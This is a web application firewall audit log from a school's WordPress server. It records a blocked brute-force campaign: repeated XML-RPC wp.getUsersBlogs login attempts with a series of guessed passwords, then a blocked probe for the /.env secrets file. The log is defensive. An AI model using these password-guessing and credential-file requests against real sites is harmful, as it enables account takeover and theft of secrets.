wp.getUsersBlogs
wakakur
booboo
--f1bfa413-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f1bfa413-E--
--f1bfa413-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069836770034 5640 (- - -)
Stopwatch2: 1745069836770034 5640; combined=3969, p1=446, p2=3139, p3=0, p4=0, p5=206, sr=88, sw=178, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f1bfa413-Z--
--4900d161-A--
[19/Apr/2025:20:38:18 +0700] aAOnSg6cTFSgLAHl7PrTqQAAABQ 103.236.140.4 40000 103.236.140.4 8181
--4900d161-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4900d161-C--
wp.getUsersBlogs
wakakur
marina
--4900d161-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4900d161-E--
--4900d161-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069898677592 5364 (- - -)
Stopwatch2: 1745069898677592 5364; combined=3812, p1=490, p2=3145, p3=0, p4=0, p5=104, sr=86, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4900d161-Z--
--1ddc0e30-A--
[19/Apr/2025:20:39:24 +0700] aAOnjA6cTFSgLAHl7PrT2QAAABY 103.236.140.4 40318 103.236.140.4 8181
--1ddc0e30-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1ddc0e30-C--
wp.getUsersBlogs
wakakur
Marketing2021
--1ddc0e30-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1ddc0e30-E--
--1ddc0e30-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745069964079031 5141 (- - -)
Stopwatch2: 1745069964079031 5141; combined=4082, p1=492, p2=3403, p3=0, p4=0, p5=109, sr=90, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1ddc0e30-Z--
--f4b86d54-A--
[19/Apr/2025:20:40:24 +0700] aAOnyA6cTFSgLAHl7PrT7AAAAAU 103.236.140.4 40590 103.236.140.4 8181
--f4b86d54-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f4b86d54-C--
wp.getUsersBlogs
wakakur
marketing2015_
--f4b86d54-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f4b86d54-E--
--f4b86d54-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070024338664 5974 (- - -)
Stopwatch2: 1745070024338664 5974; combined=4266, p1=527, p2=3432, p3=0, p4=0, p5=169, sr=98, sw=138, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f4b86d54-Z--
--f8eab94a-A--
[19/Apr/2025:20:41:26 +0700] aAOoBnNa4dA2HllpK_N4KAAAAJg 103.236.140.4 40880 103.236.140.4 8181
--f8eab94a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f8eab94a-C--
wp.getUsersBlogs
wakakur
blessed1
--f8eab94a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f8eab94a-E--
--f8eab94a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070086280868 5051 (- - -)
Stopwatch2: 1745070086280868 5051; combined=3971, p1=480, p2=3301, p3=0, p4=0, p5=110, sr=87, sw=80, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f8eab94a-Z--
--439edc79-A--
[19/Apr/2025:20:42:28 +0700] aAOoREruoUXZj665VUHyJAAAANU 103.236.140.4 41164 103.236.140.4 8181
--439edc79-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--439edc79-C--
wp.getUsersBlogs
wakakur
wakakur@1998
--439edc79-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--439edc79-E--
--439edc79-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070148449977 5540 (- - -)
Stopwatch2: 1745070148449977 5540; combined=3961, p1=506, p2=3266, p3=0, p4=0, p5=110, sr=110, sw=79, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--439edc79-Z--
--9eef1423-A--
[19/Apr/2025:20:43:32 +0700] aAOohHNa4dA2HllpK_N4hwAAAJM 103.236.140.4 41456 103.236.140.4 8181
--9eef1423-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9eef1423-C--
wp.getUsersBlogs
wakakur
wakakur@2004
--9eef1423-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9eef1423-E--
--9eef1423-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070212752055 5459 (- - -)
Stopwatch2: 1745070212752055 5459; combined=3842, p1=484, p2=3173, p3=0, p4=0, p5=107, sr=89, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9eef1423-Z--
--ee948d27-A--
[19/Apr/2025:20:44:32 +0700] aAOowHNa4dA2HllpK_N4uQAAAJg 103.236.140.4 41744 103.236.140.4 8181
--ee948d27-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ee948d27-C--
wp.getUsersBlogs
wakakur
tiffany
--ee948d27-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ee948d27-E--
--ee948d27-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070272209993 4278 (- - -)
Stopwatch2: 1745070272209993 4278; combined=3248, p1=378, p2=2707, p3=0, p4=0, p5=95, sr=79, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ee948d27-Z--
--1faa865c-A--
[19/Apr/2025:20:45:37 +0700] aAOpAUruoUXZj665VUHyfAAAANQ 103.236.140.4 42104 103.236.140.4 8181
--1faa865c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1faa865c-C--
wp.getUsersBlogs
wakakur
poopoo
--1faa865c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1faa865c-E--
--1faa865c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070337257280 5568 (- - -)
Stopwatch2: 1745070337257280 5568; combined=3862, p1=473, p2=3222, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1faa865c-Z--
--ae1e956c-A--
[19/Apr/2025:20:46:43 +0700] aAOpQ3Na4dA2HllpK_N46gAAAJE 103.236.140.4 42454 103.236.140.4 8181
--ae1e956c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ae1e956c-C--
wp.getUsersBlogs
wakakur
london12
--ae1e956c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ae1e956c-E--
--ae1e956c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070403642374 5568 (- - -)
Stopwatch2: 1745070403642374 5568; combined=3971, p1=480, p2=3313, p3=0, p4=0, p5=104, sr=89, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ae1e956c-Z--
--16a5bc15-A--
[19/Apr/2025:20:47:49 +0700] aAOphXNa4dA2HllpK_N4_AAAAIo 103.236.140.4 42762 103.236.140.4 8181
--16a5bc15-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--16a5bc15-C--
wp.getUsersBlogs
wakakur
q1w2e3r4t5
--16a5bc15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--16a5bc15-E--
--16a5bc15-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070469773143 5607 (- - -)
Stopwatch2: 1745070469773143 5607; combined=3983, p1=498, p2=3215, p3=0, p4=0, p5=165, sr=89, sw=105, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--16a5bc15-Z--
--2aaad52a-A--
[19/Apr/2025:20:48:51 +0700] aAOpw-vDiFC_ir7MDwbiKwAAAFc 103.236.140.4 43088 103.236.140.4 8181
--2aaad52a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2aaad52a-C--
wp.getUsersBlogs
wakakur
123789
--2aaad52a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2aaad52a-E--
--2aaad52a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070531506408 5103 (- - -)
Stopwatch2: 1745070531506408 5103; combined=3464, p1=446, p2=2868, p3=0, p4=0, p5=88, sr=83, sw=62, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2aaad52a-Z--
--96a70e40-A--
[19/Apr/2025:20:49:51 +0700] aAOp_0ruoUXZj665VUHy8gAAAMI 103.236.140.4 43352 103.236.140.4 8181
--96a70e40-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--96a70e40-C--
wp.getUsersBlogs
wakakur
rootroot
--96a70e40-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--96a70e40-E--
--96a70e40-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070591062637 5316 (- - -)
Stopwatch2: 1745070591062637 5316; combined=3788, p1=470, p2=3151, p3=0, p4=0, p5=98, sr=87, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--96a70e40-Z--
--1309ca44-A--
[19/Apr/2025:20:50:57 +0700] aAOqQevDiFC_ir7MDwbiQwAAAFg 103.236.140.4 43650 103.236.140.4 8181
--1309ca44-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1309ca44-C--
wp.getUsersBlogs
wakakur
admin@888
--1309ca44-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1309ca44-E--
--1309ca44-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070657388197 5530 (- - -)
Stopwatch2: 1745070657388197 5530; combined=3917, p1=488, p2=3263, p3=0, p4=0, p5=96, sr=88, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1309ca44-Z--
--bb55cb64-A--
[19/Apr/2025:20:51:57 +0700] aAOqfUruoUXZj665VUHzKAAAANg 103.236.140.4 43990 103.236.140.4 8181
--bb55cb64-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--bb55cb64-C--
wp.getUsersBlogs
wakakur
account
--bb55cb64-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bb55cb64-E--
--bb55cb64-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070717761574 5298 (- - -)
Stopwatch2: 1745070717761574 5298; combined=4070, p1=490, p2=3394, p3=0, p4=0, p5=109, sr=92, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bb55cb64-Z--
--0c6e5a3d-A--
[19/Apr/2025:20:52:56 +0700] aAOquOvDiFC_ir7MDwbiZQAAAFc 103.236.140.4 44268 103.236.140.4 8181
--0c6e5a3d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 167.71.29.211
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 167.71.29.211
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
--0c6e5a3d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0c6e5a3d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745070776593669 805 (- - -)
Stopwatch2: 1745070776593669 805; combined=358, p1=312, p2=0, p3=0, p4=0, p5=46, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
